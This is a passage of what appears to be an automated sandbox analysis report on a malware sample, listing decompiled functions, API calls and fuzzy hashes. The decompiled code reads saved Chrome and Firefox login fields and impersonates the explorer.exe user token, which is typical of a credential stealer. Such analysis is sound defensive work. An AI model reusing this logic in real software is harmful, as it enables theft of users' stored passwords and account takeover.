                                                                                                                                        0x100095c6
                                                                                                                                        0x100095cc
                                                                                                                                        0x100095d2
                                                                                                                                        0x100095d8
                                                                                                                                        0x100095de
                                                                                                                                        0x100095e4
                                                                                                                                        0x100095ff
                                                                                                                                        0x10009619
                                                                                                                                        0x10009633
                                                                                                                                        0x10009638
                                                                                                                                        0x1000963c
                                                                                                                                        0x10009642
                                                                                                                                        0x10009646
                                                                                                                                        0x10009656
                                                                                                                                        0x10009662
                                                                                                                                        0x10009667
                                                                                                                                        0x1000966e
                                                                                                                                        0x10009675
                                                                                                                                        0x1000967c
                                                                                                                                        0x100096d0
                                                                                                                                        0x100096d7
                                                                                                                                        0x100096f3
                                                                                                                                        0x100096fa
                                                                                                                                        0x100096fc
                                                                                                                                        0x100096fc
                                                                                                                                        0x100096fc
                                                                                                                                        0x100096d9
                                                                                                                                        0x100096ec
                                                                                                                                        0x100096ec
                                                                                                                                        0x00000000
                                                                                                                                        0x1000967e
                                                                                                                                        0x10009696
                                                                                                                                        0x10009696
                                                                                                                                        0x10009698
                                                                                                                                        0x100096ad
                                                                                                                                        0x100096ad
                                                                                                                                        0x100096b2
                                                                                                                                        0x100096b2
                                                                                                                                        0x100096b4
                                                                                                                                        0x100096c9
                                                                                                                                        0x100096c9
                                                                                                                                        0x100096fe
                                                                                                                                        0x100096fe
                                                                                                                                        0x10009700
                                                                                                                                        0x10009702
                                                                                                                                        0x10009706
                                                                                                                                        0x10009713
                                                                                                                                        0x10009713
                                                                                                                                        0x10009721
                                                                                                                                        0x10009724
                                                                                                                                        0x10009728
                                                                                                                                        0x1000972a
                                                                                                                                        0x1000972e
                                                                                                                                        0x10009736
                                                                                                                                        0x10009741
                                                                                                                                        0x1000974c
                                                                                                                                        0x10009757
                                                                                                                                        0x10009757
                                                                                                                                        0x1000972e
                                                                                                                                        0x10009728
                                                                                                                                        0x1000975f
                                                                                                                                        0x10009767
                                                                                                                                        0x00000000
                                                                                                                                        0x1000976f
                                                                                                                                        0x1000967c
                                                                                                                                        0x10009646
                                                                                                                                        0x1000963c
                                                                                                                                        0x100095e4
                                                                                                                                        0x100095d8
                                                                                                                                        0x10009775
                                                                                                                                        0x100095c0
                                                                                                                                        0x100095c0
                                                                                                                                        0x100095c0

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000001), ref: 10009683
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 10009691
                                                                                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 1000969F
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 100096AD
                                                                                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 100096BB
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 100096C9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: ftp.$ftp://$http://$https://
                                                                                                                                        • API String ID: 1659193697-2878239594
                                                                                                                                        • Opcode ID: 9fa96e3b8e1d8b797c2f5cbf07c57b8949626af6cba1b7897d13e5867c4a8527
                                                                                                                                        • Instruction ID: 1ff1fc447f0b7785abd9fd59a0dd95ebbbdf624f50d86c182452470306d3a48f
                                                                                                                                        • Opcode Fuzzy Hash: 9fa96e3b8e1d8b797c2f5cbf07c57b8949626af6cba1b7897d13e5867c4a8527
                                                                                                                                        • Instruction Fuzzy Hash: 4A41FA76914109EEEF02DFA0DC45AEE7BB9FB08384F108121F515B5069DB729AA0DB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10002E29, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67registryUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E10002E29(void* __ebx) {
				int _t25;
				void* _t33;
				void* _t36;
				void* _t45;
				void* _t49;
				int _t51;
				void* _t52;

				_t49 = __ebx;
				while(1) {
					L15:
					while(1) {
						L17:
						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
						L1:
						if(_t25 != 0) {
							L2:
							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
								L17:
								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
								goto L1;
							} else {
								L3:
								 *(_t52 - 0x13c) = 0;
								_t33 =  *0x1000f49c( *(_t52 - 0x12c), _t52 - 0x13c);
								_t51 =  *(_t52 - 0x13c);
								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
									continue;
								} else {
									L5:
									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
									if(_t36 == 0) {
										continue;
									} else {
										L6:
										 *(_t52 - 8) = _t36;
										if(OpenProcessToken( *(_t52 - 8), 0x201eb, _t52 - 4) == 0) {
											CloseHandle( *(_t52 - 8));
											continue;
											do {
												do {
													do {
														goto L17;
													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
													goto L3;
												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
												goto L5;
											} while (_t36 == 0);
											goto L6;
										} else {
											if(ImpersonateLoggedOnUser( *(_t52 - 4)) == 0) {
												CloseHandle( *(_t52 - 4));
												CloseHandle( *(_t52 - 8));
												goto L15;
											} else {
												_t49 = _t49 + 1;
												 *(_t52 - 0x140) = 0;
												_t45 = _t52 - 0x140;
												_push(_t45);
												_push(0xf003f);
												L1000BAD0();
												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
													 *0x1000f159 =  *(_t52 - 0x140);
												}
												if( *((intOrPtr*)(_t52 + 8)) != 0) {
													 *__eax =  *(_t52 - 4);
												}
											}
										}
									}
								}
							}
						}
						CloseHandle( *(_t52 - 0x138));
						return _t49;
					}
				}
			}










                                                                                                                                        0x10002e29
                                                                                                                                        0x10002e3b
                                                                                                                                        0x10002e3b
                                                                                                                                        0x10002e45
                                                                                                                                        0x10002e45
                                                                                                                                        0x10002e52
                                                                                                                                        0x10002d51
                                                                                                                                        0x10002d53
                                                                                                                                        0x10002d59
                                                                                                                                        0x10002d6c
                                                                                                                                        0x10002e45
                                                                                                                                        0x10002e52
                                                                                                                                        0x00000000
                                                                                                                                        0x10002d72
                                                                                                                                        0x10002d72
                                                                                                                                        0x10002d72
                                                                                                                                        0x10002d89
                                                                                                                                        0x10002d8f
                                                                                                                                        0x10002d97
                                                                                                                                        0x00000000
                                                                                                                                        0x10002da6
                                                                                                                                        0x10002da6
                                                                                                                                        0x10002db8
                                                                                                                                        0x10002dba
                                                                                                                                        0x00000000
                                                                                                                                        0x10002dc0
                                                                                                                                        0x10002dc0
                                                                                                                                        0x10002dc0
                                                                                                                                        0x10002dd7
                                                                                                                                        0x10002e40
                                                                                                                                        0x10002e40
                                                                                                                                        0x10002e45
                                                                                                                                        0x10002e45
                                                                                                                                        0x10002e45
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10002e45
                                                                                                                                        0x00000000
                                                                                                                                        0x10002e45
                                                                                                                                        0x00000000
                                                                                                                                        0x10002dd9
                                                                                                                                        0x10002de4
                                                                                                                                        0x10002e2e
                                                                                                                                        0x10002e36
                                                                                                                                        0x00000000
                                                                                                                                        0x10002de6
                                                                                                                                        0x10002de6
                                                                                                                                        0x10002de7
                                                                                                                                        0x10002df1
                                                                                                                                        0x10002df7
                                                                                                                                        0x10002df8
                                                                                                                                        0x10002dfd
                                                                                                                                        0x10002e04
                                                                                                                                        0x10002e15
                                                                                                                                        0x10002e15
                                                                                                                                        0x10002e20
                                                                                                                                        0x10002e25
                                                                                                                                        0x10002e25
                                                                                                                                        0x10002e27
                                                                                                                                        0x10002de4
                                                                                                                                        0x10002dd7
                                                                                                                                        0x10002dba
                                                                                                                                        0x10002d97
                                                                                                                                        0x10002d6c
                                                                                                                                        0x10002e62
                                                                                                                                        0x10002e6b
                                                                                                                                        0x10002e6b
                                                                                                                                        0x10002e45

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(?,explorer.exe), ref: 10002D65
                                                                                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe), ref: 10002D89
                                                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 10002DB3
                                                                                                                                        • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 10002DCF
                                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 10002DDC
                                                                                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 10002DFD
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E2E
                                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 10002E36
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E40
                                                                                                                                        • Process32Next.KERNEL32 ref: 10002E52
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E62
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                                                                                                        • String ID: explorer.exe
                                                                                                                                        • API String ID: 3144406365-3187896405
                                                                                                                                        • Opcode ID: b031d7eb600dd4d3a026a6c6892b47645c1526bacc70020c88217b2f7b9af005
                                                                                                                                        • Instruction ID: efb129f0f8724635ee390654e884786d24d33efd99524f12bb8733396b9faff8
                                                                                                                                        • Opcode Fuzzy Hash: b031d7eb600dd4d3a026a6c6892b47645c1526bacc70020c88217b2f7b9af005
                                                                                                                                        • Instruction Fuzzy Hash: 30212932A40558EBEF62DF50CC46BEEBBB4EB083C4F1040A5E619A5069DB309F94EF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10009028, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                        			E10009028(CHAR* _a4, intOrPtr _a8) {
				char* _t14;
				int _t17;
				int _t20;
				CHAR* _t29;

				E100028D7(_a4);
				_t14 = StrStrIA(_a4, 0x100104d2);
				if(_t14 != 0) {
					 *_t14 = 0;
					E100028D7(_a4);
					_t29 = "CONSTRAINT";
					while(1) {
						_t17 = lstrcmpiA(_t29, _a4);
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						asm("repne scasb");
						if( *_t29 != 0) {
							continue;
						} else {
							_t20 = lstrlenA(_a4);
							if(_t20 != 0) {
								if(lstrcmpiA(_a4, "origin_url") == 0) {
									_push(_a8);
									_pop( *0x10012e8c);
								}
								if(lstrcmpiA(_a4, "password_value") == 0) {
									_push(_a8);
									_pop( *0x10012e90);
								}
								if(lstrcmpiA(_a4, "username_value") == 0) {
									_push(_a8);
									_pop( *0x10012e94);
								}
								return 1;
							} else {
								return _t20;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t14;
				}
				L15:
			}







                                                                                                                                        0x1000902f
                                                                                                                                        0x10009041
                                                                                                                                        0x10009043
                                                                                                                                        0x1000904a
                                                                                                                                        0x10009050
                                                                                                                                        0x10009055
                                                                                                                                        0x1000905a
                                                                                                                                        0x10009063
                                                                                                                                        0x10009065
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000906c
                                                                                                                                        0x10009074
                                                                                                                                        0x10009078
                                                                                                                                        0x00000000
                                                                                                                                        0x1000907a
                                                                                                                                        0x10009082
                                                                                                                                        0x10009084
                                                                                                                                        0x1000909a
                                                                                                                                        0x1000909c
                                                                                                                                        0x1000909f
                                                                                                                                        0x1000909f
                                                                                                                                        0x100090b4
                                                                                                                                        0x100090b6
                                                                                                                                        0x100090b9
                                                                                                                                        0x100090b9
                                                                                                                                        0x100090ce
                                                                                                                                        0x100090d0
                                                                                                                                        0x100090d3
                                                                                                                                        0x100090d3
                                                                                                                                        0x100090e0
                                                                                                                                        0x10009088
                                                                                                                                        0x10009088
                                                                                                                                        0x10009088
                                                                                                                                        0x10009084
                                                                                                                                        0x00000000
                                                                                                                                        0x10009078
                                                                                                                                        0x10009069
                                                                                                                                        0x10009047
                                                                                                                                        0x10009047
                                                                                                                                        0x10009047
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100028D7: lstrlenA.KERNEL32(?), ref: 1000290B
                                                                                                                                        • StrStrIA.SHLWAPI(?,100104D2), ref: 1000903C
                                                                                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,100104D2), ref: 1000905E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrlen
                                                                                                                                        • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                                                                                                        • API String ID: 3649823140-2401479949
                                                                                                                                        • Opcode ID: dcacee77fdbfdbfb3d9820e5557edd114650b59a69890f83824c37d2690222b5
                                                                                                                                        • Instruction ID: e8bd7cd31ca1c7768776c91f8ef3d9532c1af92d831bb6c34eb1698525fece6d
                                                                                                                                        • Opcode Fuzzy Hash: dcacee77fdbfdbfb3d9820e5557edd114650b59a69890f83824c37d2690222b5
                                                                                                                                        • Instruction Fuzzy Hash: E611C27B200845BAEF11DF24DC0298D3FD1EB613E8B00C021FA55A816AE775D9A1CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 100094F8, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                        			E100094F8(CHAR* _a4, intOrPtr _a8) {
				char* _t14;
				int _t17;
				int _t20;
				CHAR* _t29;

				E100028D7(_a4);
				_t14 = StrStrIA(_a4, 0x100104d2);
				if(_t14 != 0) {
					 *_t14 = 0;
					E100028D7(_a4);
					_t29 = "CONSTRAINT";
					while(1) {
						_t17 = lstrcmpiA(_t29, _a4);
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						asm("repne scasb");
						if( *_t29 != 0) {
							continue;
						} else {
							_t20 = lstrlenA(_a4);
							if(_t20 != 0) {
								if(lstrcmpiA(_a4, "hostname") == 0) {
									_push(_a8);
									_pop( *0x10012e98);
								}
								if(lstrcmpiA(_a4, "encryptedPassword") == 0) {
									_push(_a8);
									_pop( *0x10012e9c);
								}
								if(lstrcmpiA(_a4, "encryptedUsername") == 0) {
									_push(_a8);
									_pop( *0x10012ea0);
								}
								return 1;
							} else {
								return _t20;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t14;
				}
				L15:
			}







                                                                                                                                        0x100094ff
                                                                                                                                        0x10009511
                                                                                                                                        0x10009513
                                                                                                                                        0x1000951a
                                                                                                                                        0x10009520
                                                                                                                                        0x10009525
                                                                                                                                        0x1000952a
                                                                                                                                        0x10009533
                                                                                                                                        0x10009535
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000953c
                                                                                                                                        0x10009544
                                                                                                                                        0x10009548
                                                                                                                                        0x00000000
                                                                                                                                        0x1000954a
                                                                                                                                        0x10009552
                                                                                                                                        0x10009554
                                                                                                                                        0x1000956a
                                                                                                                                        0x1000956c
                                                                                                                                        0x1000956f
                                                                                                                                        0x1000956f
                                                                                                                                        0x10009584
                                                                                                                                        0x10009586
                                                                                                                                        0x10009589
                                                                                                                                        0x10009589
                                                                                                                                        0x1000959e
                                                                                                                                        0x100095a0
                                                                                                                                        0x100095a3
                                                                                                                                        0x100095a3
                                                                                                                                        0x100095b0
                                                                                                                                        0x10009558
                                                                                                                                        0x10009558
                                                                                                                                        0x10009558
                                                                                                                                        0x10009554
                                                                                                                                        0x00000000
                                                                                                                                        0x10009548
                                                                                                                                        0x10009539
                                                                                                                                        0x10009517
                                                                                                                                        0x10009517
                                                                                                                                        0x10009517
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 100028D7: lstrlenA.KERNEL32(?), ref: 1000290B
                                                                                                                                        • StrStrIA.SHLWAPI(?,100104D2), ref: 1000950C
                                                                                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,100104D2), ref: 1000952E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrlen
                                                                                                                                        • String ID: CONSTRAINT$encryptedPassword$encryptedUsername$hostname
                                                                                                                                        • API String ID: 3649823140-2971371156
                                                                                                                                        • Opcode ID: 9c606bf107ad5038e13c0e28fbdcb92a610125df13c33924d652742d75be40eb
                                                                                                                                        • Instruction ID: e1ee14eae353d50deec925214afc51d8cd1ac08dabf7b11ce923d922b8966a22
                                                                                                                                        • Opcode Fuzzy Hash: 9c606bf107ad5038e13c0e28fbdcb92a610125df13c33924d652742d75be40eb
                                                                                                                                        • Instruction Fuzzy Hash: CC11E97B200845BAEF02DF25DC01D8D7FD1EB612E8B00C021FA58A917AE775DAA1DB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 10002E8D, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                        			E10002E8D() {
				char _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t10;
				struct HINSTANCE__* _t15;

				_t4 = GetModuleHandleA("kernel32.dll");
				_t15 = _t4;
				_v8 = 0;
				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
					L5:
					return 0;
				} else {
					_t10 = GetProcAddress(_t15, "IsWow64Process");
					if(_t10 == 0) {
						goto L5;
					} else {
						 *_t10(GetCurrentProcess(),  &_v8);
						if(_v8 == 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				}
			}







                                                                                                                                        0x10002e9b
                                                                                                                                        0x10002ea0
                                                                                                                                        0x10002ea2
                                                                                                                                        0x10002eab
                                                                                                                                        0x10002eeb
                                                                                                                                        0x10002ef4
                                                                                                                                        0x10002ebc
                                                                                                                                        0x10002ec9
                                                                                                                                        0x10002ecb
                                                                                                                                        0x00000000
                                                                                                                                        0x10002ecd
                                                                                                                                        0x10002ed9
                                                                                                                                        0x10002edf
                                                                                                                                        0x00000000
                                                                                                                                        0x10002ee1
                                                                                                                                        0x10002eea
                                                                                                                                        0x10002eea
                                                                                                                                        0x10002edf
                                                                                                                                        0x10002ecb

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 10002E9B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 10002EB3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 10002EC4
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 10002ED3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                                                                                                        • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                                                                        • API String ID: 977827838-3073145729
                                                                                                                                        • Opcode ID: 5b79a237afadd835cf86545bfc6af71ce36a6e0d85d35b22b1c2c1cc815c26e2
                                                                                                                                        • Instruction ID: e5e534cd325a3e9d84e4aad81ea4bb789e1f2123527bc56bb0060dd97492ce48
                                                                                                                                        • Opcode Fuzzy Hash: 5b79a237afadd835cf86545bfc6af71ce36a6e0d85d35b22b1c2c1cc815c26e2
                                                                                                                                        • Instruction Fuzzy Hash: 7AF0896760090466FB50D6B8DCC5BEE72DCD7411E9F160439F205E2186EA65DD059261
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 100070CA, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 117UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E100070CA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char* _v12;
				char _v20;
				CHAR* _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t38;
				intOrPtr _t40;
				intOrPtr _t43;
				char* _t50;
				char* _t59;
				char* _t61;
				void* _t70;
				char* _t75;
				char* _t77;
				char* _t79;

				_t70 = __ecx;
				_t38 = E10001EEF(_a8);
				if(_t38 != 0) {
					_t40 = E10004137(_a8);
					__eflags = _t40;
					if(_t40 == 0) {
						E10006B0B(_a12, _a16);
						_t43 = E10001FB7(__eflags, _a8,  &_v20);
						__eflags = _t43;
						if(_t43 != 0) {
							_v24 = E10001888(0x200);
							_v28 = E10001888(0x200);
							_v32 = E10001888(0x200);
							_t50 = StrStrIA(_v12, "hostname\":\"");
							__eflags = _t50;
							if(_t50 != 0) {
								_t75 = _t50 + 0xb;
								while(1) {
									__eflags =  *_t75 - 0x22;
									if( *_t75 == 0x22) {
										break;
									}
									asm("movsb");
								}
								_t59 = StrStrIA(_v12, "encryptedPassword\":\"");
								__eflags = _t59;
								if(_t59 != 0) {
									_t77 = _t59 + 0x14;
									while(1) {
										__eflags =  *_t77 - 0x22;
										if( *_t77 == 0x22) {
											break;
										}
										asm("movsb");
									}
									_t61 = StrStrIA(_v12, "encryptedUsername\":\"");
									__eflags = _t61;
									if(_t61 != 0) {
										_t79 = _t61 + 0x14;
										while(1) {
											__eflags =  *_t79 - 0x22;
											if( *_t79 == 0x22) {
												break;
											}
											asm("movsb");
										}
										_v36 = E10006BEC(_t70, _v24, lstrlenA(_v24));
										_v40 = E10006BEC(_t70, _v28, lstrlenA(_v28));
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v40;
											if(_v40 != 0) {
												E10001522(_a4, 0xbeef0000);
												E10001584(_a4, _v32);
												E10001584(_a4, _v36);
												E10001584(_a4, _v40);
											}
										}
									}
								}
							}
							E10001871(_v32);
							E10001871(_v24);
							E10001871(_v28);
							E10001871(_v36);
							E10001871(_v40);
							E1000204C( &_v20);
						}
						return E10006BC3();
					} else {
						return _t40;
					}
				} else {
					return _t38;
				}
			}




















                                                                                                                                        0x100070ca
                                                                                                                                        0x100070d9
                                                                                                                                        0x100070db
                                                                                                                                        0x100070ea
                                                                                                                                        0x100070ea
                                                                                                                                        0x100070ec
                                                                                                                                        0x100070f9
                                                                                                                                        0x10007105
                                                                                                                                        0x1000710a
                                                                                                                                        0x1000710c
                                                                                                                                        0x1000711c
                                                                                                                                        0x10007129
                                                                                                                                        0x10007136
                                                                                                                                        0x10007146
                                                                                                                                        0x10007146
                                                                                                                                        0x10007148
                                                                                                                                        0x10007153
                                                                                                                                        0x10007159
                                                                                                                                        0x10007159
                                                                                                                                        0x1000715c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10007158
                                                                                                                                        0x10007158
                                                                                                                                        0x1000716b
                                                                                                                                        0x1000716b
                                                                                                                                        0x1000716d
                                                                                                                                        0x10007178
                                                                                                                                        0x1000717e
                                                                                                                                        0x1000717e
                                                                                                                                        0x10007181
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000717d
                                                                                                                                        0x1000717d
                                                                                                                                        0x10007190
                                                                                                                                        0x10007190
                                                                                                                                        0x10007192
                                                                                                                                        0x10007199
                                                                                                                                        0x1000719f
                                                                                                                                        0x1000719f
                                                                                                                                        0x100071a2
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000719e
                                                                                                                                        0x1000719e
                                                                                                                                        0x100071b5
                                                                                                                                        0x100071c9
                                                                                                                                        0x100071cc
                                                                                                                                        0x100071d0
                                                                                                                                        0x100071d2
                                                                                                                                        0x100071d6
                                                                                                                                        0x100071e0
                                                                                                                                        0x100071eb
                                                                                                                                        0x100071f6
                                                                                                                                        0x10007201
                                                                                                                                        0x10007201
                                                                                                                                        0x100071d6
                                                                                                                                        0x100071d0
                                                                                                                                        0x10007192
                                                                                                                                        0x1000716d
                                                                                                                                        0x10007209
                                                                                                                                        0x10007211
                                                                                                                                        0x10007219
                                                                                                                                        0x10007221
                                                                                                                                        0x10007229
                                                                                                                                        0x10007232
                                                                                                                                        0x10007232
                                                                                                                                        0x1000723e
                                                                                                                                        0x100070f0
                                                                                                                                        0x100070f0
                                                                                                                                        0x100070f0
                                                                                                                                        0x100070df
                                                                                                                                        0x100070df
                                                                                                                                        0x100070df

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: encryptedPassword":"$encryptedUsername":"$hostname":"
                                                                                                                                        • API String ID: 0-653306420
                                                                                                                                        • Opcode ID: 599aa5b4b63fc17a903d442d354a0c4829d1819cf81b9a9489ec28215852942a
                                                                                                                                        • Instruction ID: 4329ed4530f3b2e0f2b5c2f7938b4f80b03f70469c0e1cf8edac79dde31dbab1
                                                                                                                                        • Opcode Fuzzy Hash: 599aa5b4b63fc17a903d442d354a0c4829d1819cf81b9a9489ec28215852942a
                                                                                                                                        • Instruction Fuzzy Hash: 4A414479D0010AAAFF11DFA0CC069EE7AB1FF053D0F154020F915751AADB3AAE51D760
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10001FB7, Relevance: 10.6, APIs: 7, Instructions: 57fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001FB7(void* __eflags, CHAR* _a4, void** _a8) {
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t20;
				void** _t24;

				_t24 = _a8;
				E1000189F(_t24, 0x10);
				_t11 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
				 *_t24 = _t11;
				_t12 = _t11 + 1;
				if(_t12 != 0) {
					_t24[3] = GetFileSize(_t12 - 1, 0);
					_t18 = CreateFileMappingA( *_t24, 0, 2, 0, 0, 0);
					if(_t18 == 0) {
						CloseHandle( *_t24);
						 *_t24 = 0xffffffff;
					} else {
						_t24[1] = _t18;
						_t20 = MapViewOfFile(_t18, 4, 0, 0, 0);
						_t24[2] = _t20;
						if(_t20 == 0) {
							CloseHandle(_t24[1]);
							CloseHandle( *_t24);
							 *_t24 = 0xffffffff;
						}
					}
				}
				return 0 | _t24[2] != 0x00000000;
			}








                                                                                                                                        0x10001fbb
                                                                                                                                        0x10001fc1
                                                                                                                                        0x10001fd8
                                                                                                                                        0x10001fdd
                                                                                                                                        0x10001fdf
                                                                                                                                        0x10001fe0
                                                                                                                                        0x10001feb
                                                                                                                                        0x10001fff
                                                                                                                                        0x10002001
                                                                                                                                        0x10002034
                                                                                                                                        0x10002039
                                                                                                                                        0x10002003
                                                                                                                                        0x10002003
                                                                                                                                        0x1000200f
                                                                                                                                        0x10002014
                                                                                                                                        0x10002019
                                                                                                                                        0x1000201e
                                                                                                                                        0x10002025
                                                                                                                                        0x1000202a
                                                                                                                                        0x1000202a
                                                                                                                                        0x10002030
                                                                                                                                        0x10002001
                                                                                                                                        0x10002049

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001FD8
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001FE6
                                                                                                                                        • CreateFileMappingA.KERNEL32 ref: 10001FFA
